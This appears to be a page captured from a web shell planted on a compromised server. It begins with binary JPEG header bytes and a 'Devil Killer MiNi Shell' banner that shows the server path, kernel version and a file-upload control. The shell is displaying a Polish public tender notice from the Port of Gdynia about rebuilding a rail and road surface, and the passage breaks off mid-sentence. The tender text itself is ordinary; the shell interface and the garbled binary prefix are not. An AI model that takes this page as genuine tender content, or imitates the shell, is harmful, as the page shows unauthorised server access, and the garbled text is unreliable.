JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180223/522541-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 522541-N-2018 z dnia 2018-02-23 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Zarząd Morskiego Portu Gdynia S.A.</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Przebudowa nawierzchni kolejowo - drogowej na Nabrzeżu Indyjskim</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie nieobowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Zarząd Morskiego Portu Gdynia S.A.</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">19192057700000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Rotterdamska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">9</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">81-337 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Gdynia</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">pomorskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">58 6274036</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">przetargi@port.gdynia.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">58 6274578</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.port.gdynia.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia">www.port.gdynia.pl/pl/wydarzenia/przetargi</span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Port Morski</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.port.gdynia.pl/pl/wydarzenia/przetargi</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.port.gdynia.pl/pl/wydarzenia/przetargi</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty należy składać w formie pisemnej w siedzibie Zarządu Morskiego Portu Gdynia S.A. </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">ul. Rotterdamska 9, 81-337 Gdynia, Dział Umów Technicznych, klatka B, III piętro, pokój nr 330 </span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Przebudowa nawierzchni kolejowo - drogowej na Nabrzeżu Indyjskim</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZU - 227/36/JC/ZIB/R/220/LP/336/2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">tylko jednej części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia jest:1)	opracowanie zamiennego projektu budowlanego i projektów wykonawczych oraz uzyskanie decyzji o zmianie pozwolenia na budowę dla zadania ,,Przebudowa nawierzchni kolejowo drogowej wraz z przebudową uzbrojenia podziemnego w I strefie Nabrzeża Indyjskiego" wraz z pełnieniem nadzoru autorskiego;2)	wykonanie robót budowlanych polegających na przebudowie istniejącego układu torowego z budową nowych rozjazdów typu portowego, budową odwodnienia torowiska i przebudową infrastruktury podziemnej na podstawie dokumentacji technicznej opracowanej przez NORD-Investments Spółka z o.o. z siedzibą w Pruszczu Gdańskim stanowiącej załącznik numer 5 do SIWZ, szczegółowo opisanej w ust.3 (decyzja o pozwoleniu na budowę Nr WI-II.7840.1.94.175.2015.OA z dnia 15.05.2015 r. stanowi załącznik numer 6 do SIWZ) oraz projektu zamiennego opracowanego przez Wykonawcę wraz z uzyskaniem decyzji o pozwoleniu na użytkowanie.2.	Szczegółowy zakres przedmiotu zamówienia obejmuje:1)	opracowanie wielobranżowego zamiennego projektu budowlanego i projektów wykonawczych (aktualizacja dokumentacji technicznej opracowanej przez NORD-Investments Spółka z o.o. z siedzibą w Pruszczu Gdański, zwanej dalej ,,dokumentacją techniczną" stanowiącą załącznik numer 5 do SIWZ) wraz z wszystkimi niezbędnymi, do uzyskania decyzji o zmianie pozwolenia na budowę i pozwolenia na użytkowanie, opracowaniami i uzgodnieniami zwanymi dalej ,,dokumentacją projektową", w tym pełnienie nadzoru autorskiego nad wykonaniem robót budowlanych wskazanych w ust. 1 pkt.2).Aktualizacja projektu budowlanego i projektów wykonawczych musi uwzględniać poniższe założenia:a)	na odcinku od początku inwestycji do krawędzi przejazdu nie przewiduje się zamian projektowych w stosunku do projektu NORD-Investments;b)	na odcinku od początku przejazdu do zaprojektowanych przez NORD-Investments torów na płycie żelbetowej (km 0,5+36,26) zaprojektowanie torów na płycie żelbetowej z zabudowaną przestrzenią pomiędzy szynami;c)	na odcinku od początku przejazdu do końca robót zaprojektowanie nawierzchni drogowej betonowej pomiędzy płytą po torem nr 503, a istniejącym murem i ogrodzeniem;d)	dostosowanie branż: wod.-kan., drogowej i elektroenergetycznej do nowoprojektowanej nawierzchni;e)	wszystkie parametry techniczne dotyczące np. jakości materiałów, zagęszczenia gruntów itp. nie mogą być gorsze od parametrów technicznych wskazanych w dokumentacji technicznej NORD-Investments i materiałach uzupełniających Zamawiającego stanowiących załącznik numer 5 do SIWZ;f)	w zakresie inwestycji nie występują prace branży telekomunikacyjnej, które zostały zrealizowane w terminie wcześniejszym, z wyjątkiem rozbiórki studni zlokalizowanej pomiędzy torami 501 i 502 w ciągu ul. Celnej, która zostanie rozebrana w ramach robót torowych. g)	wykonanie i dostarczenie wszystkich opracowań w formacie pdf i dodatkowo rysunków w formacie dwg, tj.projektu budowlanego - plan zagospodarowania terenu,projektu budowlanego, projektu wykonawczego,skorygowanych przedmiarów robót w branżach: kolejowej, drogowej, wod.-kan. i elektroenergetycznej;h)	aktualizacja, bądź wykonanie wszystkich niezbędnych opracowań koniecznych do uzyskania decyzji o zmianie pozwolenia na budowę, w tym:mapy do celów projektowych,pozwolenia wodno-prawnego, decyzji o środowiskowych uwarunkowaniach zgody na realizację inwestycji oraz wszystkie niezbędne uzgodnienia wynikające z tej decyzji;i)	złożenie wniosku i uzyskanie w imieniu Zamawiającego decyzji o zmianie pozwolenia na budowę;j)	aktualizację przedmiaru robót - z podziałem na branże.Materiałem wyjściowym dla prac projektowych jest dokumentacja techniczna opracowana przez NORD-Investments Spółka z o.o. z siedzibą w Pruszczu Gdańskim wraz z uzupełniającymi ją rysunkami Zamawiającego, stanowiącymi załącznik numer 5 do SIWZ.2)	Wykonanie robót budowlanych w zakresie branż: kolejowej, wod.-kan., drogowej i elektroenergetycznej na odcinku od bramy kolejowej do trafostacji T 226, na podstawie decyzji o pozwoleniu na budowę Nr WI-II.7840.1.94.175.2015.OA z dnia 15.05.2015 r. oraz decyzji o zmianie pozwolenia na budowę uzyskanej przez Wykonawcę, obejmujących: a)	przebudowę układu torów kolejowych i rozjazdów na długości ~ 650,0 m od bramy kolejowej w torze nr 504 do stacji transformatorowej T-226 wraz z przebudową nawierzchni kolejowo-drogowej; b)	przebudowę układu drogowego;c)	przebudowę sieci: kanalizacji deszczowej (z budową nowego wylotu w Nabrzeżu Indyjskim), wodociągowej i energetycznej;d)	odwodnienie układu kolejowego i drogowego;e)	w zakresie robót branży telekomunikacyjnej Zamawiający przewiduje: istniejąca studnia zlokalizowana pomiędzy torami 501 i 502 w ciągu ul. Celnej zostanie rozebrana w ramach robót torowych. Wykonawca będzie zobowiązany do osłonięcia wszystkich napotkanych w czasie prac ziemnych kabli osłonami z rur dwudzielnych,f)	uzyskanie w imieniu Zamawiającego decyzji o pozwoleniu na użytkowanie;3)	po zakończeniu wszystkich robót związanych z przedmiotem zamówienia Wykonawca zobowiązany jest dostarczyć opracowania, obejmujące:a)	w wersji papierowej:projekt budowlany we wszystkich branżach - 5 (słownie: pięć) egz.,projekt wykonawczy we wszystkich branżach - 5 (słownie: pięć) egz.,skorygowany przedmiar robót we wszystkich branżach - 3 (słownie: trzy) egz.,b)	w formie elektronicznej edytowalnej - zapis na płycie CD:projekt budowlany we wszystkich branżach - rysunki w formacie dwg - 2 (słownie: dwa) egz.,projekt wykonawczy we wszystkich branżach - opisy w formacie doc lub docx - 2 (słownie: dwa) egz.,skorygowany przedmiar robót we wszystkich branżach w formacie xls lub xlsx i w doc lub docx - 2 (słownie: dwa) egz.,c)	w formie elektronicznej nieedytowalnej - zapis na płycie CD:projekt budowlany we wszystkich branżach - rysunki w formacie pdf - 2 (słownie: dwa) egz.,projekt wykonawczy we wszystkich branżach - opisy w formacie pdf - 2 (słownie: dwa) egz.,skorygowany przedmiar robót we wszystkich branżach w formacie pdf - 2 (słownie: dwa) egz.,d)	mapę powykonawczą we wszystkich branżach zarejestrowana w ZUD Gdynia:w formacie wyplotu - 2 egz.,w formacie elektronicznej edytowalnej w formacie dwg i dgn na płycie CD - 2 (słownie: dwa) egz.3.	Dokumentacja techniczna sporządzona przez NORD-Investments Spółka z o.o. z siedzibą w Pruszczu Gdańskim, stanowiąca załącznik numer 5 do SIWZ (zwana w dalszej treści SIWZ także ,,dokumentacją techniczną"):1)	Projekt Budowlany: Spis zawartości dokumentacji PB - Etap I:a)	Nr 3029/2012 - Projekt zagospodarowania terenu;b)	Nr 3030/2012 - Projekt branży drogowej;c)	Nr 3031/2012 - Projekt branży kolejowej;d)	Nr 3032/2012 - Projekt branży wod.-kan.;e)	Nr 3033/2012 - Projekt branży elektroenergetycznej;2)	Projekt Wykonawczy:Spis zawartości dokumentacji PW - Etap I:a)	Nr 3035/2012 - Projekt branży drogowej; b)	Nr 3036/2012 - Projekt branży kolejowej; c)	Nr 3037/2012 - Projekt branży wod.-kan.; d)	Nr 3038/2012 - Projekt branży elektroenergetycznej; e)	Nr 3035/2012/ST - Specyfikacja techniczna do projektu branży drogowej; f)	Nr 3036/2012/ST - Specyfikacja techniczna do projektu branży kolejowej; g)	Nr 3037/2012/ST - Specyfikacja techniczna do projektu branży wod.-kan.; h)	Nr3038/2012/ST - Specyfikacja techniczna do projektu branży elektroenergetycznej;i)	Nr 3035/2012/KP - Kosztorys przedmiarowy do projektu branży drogowej; j)	Nr 3036/2012/KP - Kosztorys przedmiarowy do projektu branży kolejowej; k)	Nr 3037/2012/KP - Kosztorys przedmiarowy do projektu branży wod.-kan.; l)	Nr 3038/2012/KP - Kosztorys przedmiarowy do projektu branży elektroenergetycznej;3)	opinia geotechniczna wykonana dla ustalenia warunków gruntowo - wodnych sporządzona przez Przedsiębiorstwo TERRA - WIERT Marian Orzechowski; 4)	plansza ze skorygowanym zakresem robót realizowanych w I Etapie - Plan sytuacyjny ETAP I oraz rysunki Zamawiającego uszczegółowiające projekt wykonawczy:a)	Nr 04K-U - plan sytuacyjny - układ dylatacji;b)	Nr 08K-U - lokalizacja ułożenia klinów z masy elastycznej w rozjazdach;c)	Nr 09K-U - przytwierdzenie zamienne szyny;d)	Nr 01E-U - roboty elektryczne pod nawierzchnią na wysokości Spółki Vistal;e)	Nr 01A-U Plan sytuacyjny - tymczasowa lokalizacja rozjazdów (fazowanie robót Etapu I);f)	Rysunki Zamawiającego określają nw. roboty niewskazane w dokumentacji technicznej:rozbiórka fundamentów żelbetowych z zasypaniem powstałych wolnych przestrzeni;regulacja (obniżenie) torów na odcinku przejściowym o dł. ~ 40 m;wypełnienie klinów w rozjazdach masą elastyczną o wysokiej sprężystości powrotnej;wykonanie dylatacji pozornych w torach i rozjazdach wraz z ułożeniem masy termoplastycznej;roboty elektryczne na wysokości Spółki VISTAL OFFSHORE sp. z o.o. ul. Indyjska 7, 81-336 Gdynia;wbudowanie i wybudowanie połączeń rozjazdowych na okres trwania robót.4.	W związku z podziałem zakresu robót objętych dokumentacją techniczną na etapy, Zamawiający informuje, że przedmiotem niniejszego postępowania jest wyłącznie wykonanie prac objętych ETAPEM I, których dotyczy dołączona do SIWZ plansza (stanowiąca załącznik numer 5 do SIWZ) obejmująca prace Etapu I - Plan sytuacyjny ETAP I. Zakres robót obejmuje odcinek od km 0,00 (brama kolejowa w torze nr 504) do km 0,6 + 56,30 (ogrodzenie przy trafostacji T 226).5.	Roboty realizowane będą na podstawie decyzji o pozwoleniu na budowę wydanej przez Wojewodę Pomorskiego Nr WI-II.7840.1.94.175.2015.OA z dnia 15.05.2015r, stanowiącej załącznik numer 6 do SIWZ oraz decyzji o zmianie pozwolenia na budowę, którą w imieniu Zamawiającego uzyska Wykonawca, na podstawie opracowanego przez Wykonawcę projektu zamiennego.6.	Szczególne warunki prowadzenia robót:1)	roboty będą wykonywane przy zachowaniu ciągłości obsługi ruchem kolejowym terminali zlokalizowanych na Nabrzeżu Indyjskim tj. a)	BTZ: Bałtycki Terminal Zbożowy Sp. z o.o., ul. Indyjska 2, 81-336 Gdynia,b)	KOOL-e: Koole Tankstorage Gdynia Sp. z o.o., ul Indyjska 5, 81-336 Gdynia,c)	Rol-Ryż: Przedsiębiorstwo Rol-Ryż Sp. z o.o., ul. Celna 2, 81-337 Gdynia,d)	SPEED: ,,SPEED" Sp. z o.o., ul. Wendy 15, 81-341 Gdynia,e)	VISTAL: VISTAL OFFSHORE Sp. z o.o., ul. Indyjska 7, 81-336 Gdynia;2)	Wykonawca zobowiązany jest do systematycznego prowadzenia prac porządkowych w rejonie terenu budowy. Materiały i produkty z prowadzonych robót oraz odpady nie mogą być magazynowane na terenie budowy;3)	na każdym z etapów wykonywania robót Wykonawca opracuje i uzgodni z ww. Użytkownikami i służbami technicznymi Zamawiającego projekt tymczasowej organizacji ruchu, uwzględniając ciągłość prac przeładunkowych oraz konieczność zapewnienia dojazdu i dojścia do budynków zlokalizowanych na terenie i w sąsiedztwie prowadzonej inwestycji;4)	Wykonawca zobowiązany jest do zapewnienia kompleksowej obsługi geodezyjnej niezbędnej przy realizacji przedmiotu zamówienia wraz z operatem geodezyjnym powykonawczym;5)	Wykonawca zobowiązany jest do zapewnienia obsługi geologicznej. Wyniki badań stopnia/wskaźnika zagęszczenia gruntu i modułu odkształcenia wtórnego wykonawca dostarczy Zamawiającemu przed przystąpieniem do wykonywania robót technologicznych. Pomiary stopnia zagęszczenia gruntów należy na bieżąco sprawdzać, a wyniki przekazywać inspektorowi nadzoru Zamawiającego (dotyczy także zakresu robót wykonywanych przez podwykonawców);6)	Wykonawca zobowiązany jest do opracowania tymczasowego regulaminu dostosowującego sposób 